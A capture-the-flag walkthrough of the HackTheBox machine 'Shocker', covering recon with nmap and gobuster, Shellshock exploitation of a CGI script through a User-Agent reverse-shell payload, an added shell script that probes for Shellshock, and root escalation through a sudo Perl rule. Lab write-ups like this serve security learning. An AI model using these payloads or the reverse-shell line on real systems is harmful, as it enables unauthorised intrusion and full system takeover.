Shocker

Shocker is an easy machine on HackTheBox where you exploit Shellshock (CVE-2014-6271) through a CGI script to get a user shell, then abuse a sudo rule for Perl to get root.

[RECON]

$ nmap -sC -sV 10.10.10.56
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-13 13:07 BST
Nmap scan report for 10.10.10.56
Host is up (0.025s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4f8ade8f80477decf150d630a187e49 (RSA)
|   256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_  256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.23 seconds

The Nmap scan showed a web server on port 80 and SSH on the non-standard port 2222. This is what the website looked like:

At first glance there is nothing on this website at all, so I loaded up Gobuster to find any hidden directories.

$ gobuster dir -u 10.10.10.56 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/06/13 13:37:50 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/cgi-bin/             (Status: 403) [Size: 294]
/index.html           (Status: 200) [Size: 137]
/server-status        (Status: 403) [Size: 299]
Progress: 4484 / 4615 (97.16%)
===============================================================
2023/06/13 13:37:59 Finished
===============================================================

The Gobuster results show a /cgi-bin/ directory. This is where Apache keeps CGI scripts: instead of serving the file, the server executes it and hands the request details (headers, query string) to it as environment variables. Scripts run by bash in that position were exploitable via Shellshock (CVE-2014-6271), and with the box being called Shocker it is pretty obvious that this is the intended path. Directory listing is forbidden (403), so I need to enumerate the scripts inside it, this time asking Gobuster for the .sh extension:

$ gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              sh
[+] Timeout:                 10s
===============================================================
2023/06/13 13:48:09 Starting gobuster in directory enumeration mode
===============================================================
/user.sh              (Status: 200) [Size: 119]
Progress: 4307 / 441122 (0.98%)^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2023/06/13 13:48:21 Finished
===============================================================

[USER ACCESS]

Now that we have found user.sh, we can exploit Shellshock. It is a bug in how bash imports function definitions from environment variables: if a variable's value starts with "() {", bash parses it as a function, and vulnerable versions kept executing whatever followed the closing brace. Apache's CGI handler copies request headers into the script's environment (User-Agent becomes HTTP_USER_AGENT), so a header of the form "() { :;}; <command>" gets that command executed by the bash that runs user.sh. The bug dates from 2014 and is extensively documented, so finding a payload is not difficult.

$ curl -i -H "User-agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.2/4444 0>&1" http://10.10.10.56/cgi-bin/user.sh

Sending this request with a netcat listener waiting on port 4444 (10.10.14.2 in the payload is the attacker's address) returns a shell as the user shelly.
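To make the mechanism concrete, here is an added shell example (not part of the original writeup) that reproduces the three pieces locally: the classic bash environment-variable check, a constructed stand-in for a bash CGI script fed a payload through HTTP_USER_AGENT the way Apache's mod_cgi would, and a network probe function that uses id instead of a reverse shell. The CGI stub and the target URL are assumptions. On a patched bash the two local checks report "patched" and "clean"; a 2014-era bash would print "vulnerable" and "injected".

```shell
#!/bin/sh
# Added example (not from the original writeup): reproduce the Shellshock
# mechanism locally and wrap the remote probe in a function.

# 1. Local bash check. Shellshock (CVE-2014-6271) triggers when bash imports a
#    function definition from an environment variable and keeps parsing past
#    the closing brace, executing whatever follows. A patched bash prints only
#    "test"; a vulnerable one also prints "vulnerable".
shellshock_local_check() {
    if ! command -v bash >/dev/null 2>&1; then
        echo "no-bash"
        return 0
    fi
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# 2. Simulate what mod_cgi does: every request header becomes an HTTP_* variable
#    in the script's environment, so a bash CGI script receives the User-Agent
#    payload as HTTP_USER_AGENT. The script below is constructed for this
#    example; it is not the real /cgi-bin/user.sh from the box.
shellshock_cgi_simulation() {
    if ! command -v bash >/dev/null 2>&1; then
        echo "no-bash"
        return 0
    fi
    tmp=$(mktemp) || return 1
    cat >"$tmp" <<'EOF'
#!/bin/bash
echo "Content-Type: text/plain"
echo
echo "hello from a constructed test cgi script"
EOF
    out=$(HTTP_USER_AGENT='() { :;}; echo INJECTED' bash "$tmp" 2>/dev/null)
    rm -f "$tmp"
    case "$out" in
        *INJECTED*) echo "injected" ;;
        *)          echo "clean" ;;
    esac
}

# 3. Remote probe against a CGI script URL (needs network; assumed URL below).
#    Uses a harmless command (id) instead of a reverse shell. The two leading
#    "echo" calls emit the blank line that terminates the CGI headers; without
#    it Apache answers 500 and the command output never reaches the client.
shellshock_probe() {
    url=$1
    resp=$(curl -s -H 'User-Agent: () { :;}; echo; echo; /usr/bin/id' "$url")
    case "$resp" in
        *uid=*) echo "vulnerable: $resp" ;;
        *)      echo "not vulnerable (or not a bash CGI script)" ;;
    esac
}

# Usage:
#   shellshock_local_check
#   shellshock_cgi_simulation
#   shellshock_probe http://10.10.10.56/cgi-bin/user.sh
```

The probe is the same request as the reverse-shell payload above with a benign command in place of /bin/bash -i, which is the sensible first step before pointing a listener at the box: if "uid=" comes back, the reverse shell will work too.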

From here you can find the user flag.

[ROOT ACCESS]

With user access, the first thing to check is our sudo privileges with the command 'sudo -l':

shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

These results show that shelly can run /usr/bin/perl as root without a password. GTFOBins lists a one-liner for this: Perl's exec replaces the perl process with /bin/sh, and since sudo started perl as root, the shell is root as well.

shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
sudo perl -e 'exec "/bin/sh";'
whoami
root

With that we have root, now you can find that root.txt flag!